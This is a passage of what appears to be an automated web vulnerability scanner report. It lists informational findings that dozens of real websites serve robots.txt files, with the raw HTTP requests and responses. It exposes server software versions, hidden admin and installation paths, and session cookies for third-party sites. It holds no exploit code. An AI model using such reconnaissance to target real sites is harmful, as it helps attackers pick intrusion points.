Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

27.343. http://www.classic-tv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classic-tv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classic-tv.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:55:05 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 05:38:37 GMT
ETag: "2962f50-130-492146c129140"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.344. http://www.classifiedflyerads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classifiedflyerads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classifiedflyerads.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:57 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 23 Jul 2010 22:16:08 GMT
ETag: "20d00d7-16a-61b07a00"
Accept-Ranges: bytes
Content-Length: 362
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /realtor_uploads/
Disallow: /flyer_templates/
Disallow: /dev/
Disallow: /plesk-stats/
Disallow: /new_site/
Disallow: /includes/global.css
Disallow: /includes/global.js
User-ag
...[SNIP]...

27.345. http://www.clcboats.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clcboats.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clcboats.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:25 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Last-Modified: Tue, 29 Dec 2009 04:06:32 GMT
ETag: "2981a0-1ef-47bd625aaa200"
Accept-Ranges: bytes
Content-Length: 495
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

###############################
#
# sample robots.txt file for this website
#
# addresses all robots by using wild card *
#
User-agent: *
# list folders robots are not allowed to index

Disallow: /sh
...[SNIP]...

27.346. http://www.clearrate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clearrate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clearrate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:30 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 16 Apr 2008 21:18:43 GMT
ETag: "1c00f490-4d-44b040fc4827c"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cgi-bin/configgen.cgi
Disallow: /firmware/
Allow: /

27.347. http://www.clevelandgolf.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clevelandgolf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clevelandgolf.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:44:08 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 23:12:44 GMT
ETag: "928142-49-4a175e0f15300"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
sitemap: http://www.clevelandgolf.com/sitemap.xml

27.348. http://www.clrsearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clrsearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clrsearch.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 31 Oct 2010 02:29:52 GMT
ETag: "223-493e077666800"
Accept-Ranges: bytes
Content-Length: 547
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /prop/
Disallow: /props/
Disallow: /broker/
Disallow: /feeds/
Disallow: /images/
Disallow: /AboutUs.jsp
Disallow: /aboutus
Disallow: /PrivacyPolicy.jsp
Disallow: /TermsOfUse.js
...[SNIP]...

27.349. http://www.clubfly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clubfly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clubfly.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:44 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 02:11:46 GMT
ETag: "7140f1f-35d-4963bb5e89c80"
Accept-Ranges: bytes
Content-Length: 861
Connection: close
Content-Type: text/plain

# robots.txt for http://clubfly.com

User-agent:    *
Disallow:    /cgi-bin
Disallow:    /stats
Disallow:    /review
Disallow:    /exit
Disallow:    /gaybars/30309-atlanta-GA/DJ-James-Calamera/
Disallow:    /gaybars/221
...[SNIP]...

27.350. http://www.cmbresearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmbresearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cmbresearch.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 02:14:09 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-ldmjhgml=F507ED0203A6AE3C242BBD49544E61E2; path=/
Last-Modified: Tue, 22 Mar 2011 18:07:48 GMT
Content-Length: 27

User-agent: *
Disallow: /


27.351. http://www.cmgestore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmgestore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cmgestore.com

Response

HTTP/1.1 200 OK
Content-Length: 235
Content-Type: text/plain
Last-Modified: Wed, 23 Feb 2011 18:39:19 GMT
Accept-Ranges: bytes
ETag: "343747fb88d3cb1:14b9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:10:11 GMT
Connection: close

User-agent: *
Allow: /pab4/
Allow: /vw08/
Allow: /eng6/
Allow: /pab4/
Allow: /pab6/
Allow: /pab7/
Allow: /pab8/
Allow: /pb10/
Allow: /pb11/
Allow: /pb12/
Allow: /pb13/
Allow: /pb14/
Allow
...[SNIP]...

27.352. http://www.cmphotocenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmphotocenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cmphotocenter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:00:55 GMT
Server: Apache/2.2.15 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8m mod_jk/1.2.30
Last-Modified: Thu, 28 Apr 2011 21:43:34 GMT
ETag: "1000000001592-4d-4a20172f7b26d"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.cmphotocenter.com-80=591142410.20480.0000; expires=Wed, 04-May-2011 04:25:55 GMT; path=/

# Nothing here that we would want indexed
User-agent: *
Disallow: /images

27.353. http://www.cnpapers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnpapers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnpapers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 16 Apr 2010 18:15:18 GMT
ETag: "4730006-2f-97f43980"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /destinationwv/clicks/

27.354. http://www.coastal.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coastal.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coastal.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:50 GMT
Server: Apache
Last-Modified: Wed, 29 Jul 2009 13:59:50 GMT
ETag: "10780b0-19b-46fd899c0a180"
Accept-Ranges: bytes
Content-Length: 411
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /board/images/
Disallow: /students/images/
Disallow: /parents/images/
Disallow: /emergency/images/
Disallow: /education.older/
Disallow: /marketing/expertise/images/
Disallow:
...[SNIP]...

27.355. http://www.codigobarras.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codigobarras.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.codigobarras.com

Response

HTTP/1.0 200 OK
Set-Cookie: TRACKID=ee9c95cc7dea214f0837a3aef3fb8c73; Path=/; Version=1
X-Powered-By: PHP/5.2.6
Content-type: text/plain
Connection: close
Date: Wed, 04 May 2011 02:10:25 GMT
Server: lighttpd/1.4.26-devel-109890:109892M

User-agent: *
Disallow: /

27.356. http://www.coitustube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coitustube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coitustube.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:42 GMT
Server: Apache
Last-Modified: Wed, 08 Jul 2009 18:30:21 GMT
ETag: "2b3d076-17-4a54e5bd"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

27.357. http://www.collegeotr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeotr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegeotr.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 26 Jan 2010 22:55:26 GMT
ETag: "50e56-2b-2e7bf380"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain; charset=UTF-8

# User-Agent: *
# Disallow: /
# Noindex: /

27.358. http://www.coloradoan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradoan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coloradoan.com

Response

HTTP/1.0 200 OK
Content-Length: 713
Content-Type: text/plain
Last-Modified: Thu, 14 Apr 2011 17:15:06 GMT
Accept-Ranges: bytes
ETag: "089d07fc7facb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Wed, 04 May 2011 00:44:19 GMT
Connection: close

# Robots.txt
# Be nice.
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /a
...[SNIP]...

27.359. http://www.coloradocommunitynewspapers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradocommunitynewspapers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coloradocommunitynewspapers.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Wed, 04 May 2011 01:10:54 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: coloradocommunitynewspapers.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

27.360. http://www.coloradonewhomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradonewhomes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coloradonewhomes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:02 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Sat, 12 Jun 2010 18:20:32 GMT
ETag: "428c5-130-488d94fa52c91"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.361. http://www.coloring-page.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloring-page.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coloring-page.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:37 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 13 Mar 2010 15:21:29 GMT
ETag: "545a7c-48-33bb9040"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

User-agent: Mediapartners-Google
Disallow:

27.362. http://www.colsoncenter.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colsoncenter.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.colsoncenter.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:22 GMT
Server: Apache
Last-Modified: Sat, 28 Mar 2009 00:36:02 GMT
ETag: "130-4662308a8a080"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.363. http://www.com-sub.biz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.com-sub.biz
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.com-sub.biz

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.6
Last-Modified: Sat, 28 Nov 2009 06:27:49 GMT
ETag: "e930716-e2-4796881dac340"
Accept-Ranges: bytes
Content-Length: 226
Connection: close
Content-Type: text/plain

# /robots.txt file for http://www.magazinediscountcenter.com/
# mail webmaster@magazinediscountcenter.com for constructive criticism

User-agent: *
Disallow: /admin

Sitemap: http://www.magazinediscou
...[SNIP]...

27.364. http://www.comfortkeepers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comfortkeepers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comfortkeepers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:28:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 04 May 2011 02:13:28 GMT
ETag: "cacffc-6aa-4a269cd642200"
Accept-Ranges: bytes
Content-Length: 1706
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:28:52 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.365. http://www.comodo.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comodo.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:52:07 GMT
Content-Type: text/plain
Content-Length: 28
Last-Modified: Fri, 15 Dec 2006 13:32:19 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /



27.366. http://www.comparehomeservices.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comparehomeservices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comparehomeservices.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=3bsxu4fzrna0xrfcbrjqk2z2; path=/; HttpOnly
Set-Cookie: AffID=15852; domain=www.comparehomeservices.com; expires=Fri, 03-Jun-2011 01:05:52 GMT; path=/
Set-Cookie: SubID=; domain=www.comparehomeservices.com; expires=Fri, 03-Jun-2011 01:05:52 GMT; path=/
Set-Cookie: strRefer=; domain=www.comparehomeservices.com; expires=Fri, 03-Jun-2011 01:05:52 GMT; path=/
Set-Cookie: strEntryURL=http://www.comparehomeservices.com/Generic.aspx?page=/robots.txt; domain=www.comparehomeservices.com; expires=Fri, 03-Jun-2011 01:05:52 GMT; path=/
Set-Cookie: Promo=G-15852; domain=www.comparehomeservices.com; expires=Fri, 03-Jun-2011 01:05:52 GMT; path=/
Set-Cookie: Referrer=; domain=www.comparehomeservices.com; expires=Fri, 03-Jun-2011 01:05:52 GMT; path=/
Set-Cookie: EntryURL=http://www.comparehomeservices.com/Generic.aspx?page=/robots.txt; domain=www.comparehomeservices.com; expires=Fri, 03-Jun-2011 01:05:52 GMT; path=/
Set-Cookie: WebsiteAliasID=2056; domain=www.comparehomeservices.com; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 26

User-agent: *
Disallow: /

27.367. http://www.compatible-astrology.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compatible-astrology.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.compatible-astrology.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:54 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.compatible-astrology.com/BsDY3Uit.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow:
...[SNIP]...

27.368. http://www.connectorlocal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connectorlocal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.connectorlocal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:12:11 GMT
Server: Apache
Last-Modified: Thu, 12 Mar 2009 16:52:37 GMT
ETag: "1ecf6f-277-cfbb5f40"
Accept-Ranges: bytes
Content-Length: 631
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /connector/
Disallow: /advertising/
Disallow: /directory/manage/
Sitemap: http://www.connectorlocal.com/global.xml
Sitemap: http://www.connectorlocal.com/dire
...[SNIP]...

27.369. http://www.conservapedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.conservapedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.conservapedia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:59 GMT
Server: Apache/1.3.41 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.31 OpenSSL/0.9.8b PHP-CGI/0.4mm
Last-Modified: Thu, 01 Oct 2009 22:38:59 GMT
ETag: "1c90574-d6-4ac52f83"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /index.php
Disallow: /skins
Disallow: /Special:Search
Disallow: /Special:Random
Disallow: /MediaWiki:
Disallow: /Template:
User-agent: dotbot
Disallow: /
User-agent: baiduspide
...[SNIP]...

27.370. http://www.consumerdemocracy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumerdemocracy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consumerdemocracy.com

Response

HTTP/1.1 200 OK
Content-Length: 124
Content-Type: text/plain
Last-Modified: Wed, 28 Sep 2005 12:51:19 GMT
Accept-Ranges: bytes
ETag: "d03a5a522bc4c51:589f"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:10:42 GMT
Connection: close

# All robots will spider the domain
User-agent: *
User-agent: Mediapartners-Google*
User-agent: Googlebot*
Disallow:


27.371. http://www.contactingthecongress.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contactingthecongress.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contactingthecongress.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:09:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 23 Oct 2009 14:25:41 GMT
ETag: "15fa4df5-2d-4769afc8d4340"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

27.372. http://www.contentquality.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentquality.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contentquality.com

Response

HTTP/1.1 200 OK
Content-Length: 176
Content-Type: text/plain
Last-Modified: Sun, 16 Mar 2003 17:55:00 GMT
ETag: "0b2bb29e5ebc21:d2f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:06:41 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /images
Disallow: /_private
Disallow: /inc
Disallow: /pfv
Disallow: /mynewtester
Disallow: /css
Disallow: /mynewtester


27.373. http://www.cookingnook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cookingnook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cookingnook.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:48 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.cookingnook.com/oIaxp8nL.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Dis
...[SNIP]...

27.374. http://www.cool-midi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cool-midi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cool-midi.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:44:12 GMT
Server: Apache
Last-Modified: Sun, 23 Dec 2007 17:27:35 GMT
ETag: "57404a-41-441f76d666fc0"
Accept-Ranges: bytes
Content-Length: 65
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /set/
Disallow: /forum/
Disallow: /db.php

27.375. http://www.coolcomputing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolcomputing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolcomputing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 24 Apr 2010 16:55:55 GMT
ETag: "30404b-bf-6ac99cc0"
Accept-Ranges: bytes
Content-Length: 191
Expires: Thu, 05 May 2011 01:59:21 GMT
Connection: close
Content-Type: text/plain; charset=iso-8859-1

Sitemap: http://www.coolcomputing.com/sitemap.xml

User-agent: *
Disallow: admin.php
Disallow: track.php
Disallow: user.php
Disallow: download.php
#Disallow: contact-us.php
#Disallow: db.php

27.376. http://www.coolopticalillusions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolopticalillusions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolopticalillusions.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:30 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.7 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Thu, 29 Jan 2009 07:46:21 GMT
ETag: "548054-5b-49815ecd"
Accept-Ranges: bytes
Content-Length: 91
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow:
Disallow: /cgi-bin/

27.377. http://www.cordobainitiative.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cordobainitiative.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cordobainitiative.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.cordobainitiative.org/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:01:14 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.378. http://www.corolland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corolland.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.corolland.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:37 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 08:56:44 GMT
Accept-Ranges: bytes
Content-Length: 934
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Slurp
Crawl-delay: 3
Disallow: /forums/
Disallow: forums/

User-agent: MSN
Crawl-delay: 5
Disallow: /forums/min/

User-agent: msnbot
Crawl-delay: 5
Disallow: /forums/min/

User-agent: yan
...[SNIP]...

27.379. http://www.corral.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corral.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.corral.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:47:18 GMT
Server: Apache
Last-Modified: Tue, 08 Jun 2010 19:08:39 GMT
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.380. http://www.corridorcareers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corridorcareers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.corridorcareers.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sun, 06 Mar 2011 09:54:08 GMT
Accept-Ranges: bytes
ETag: "7a3da6fe4dbcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
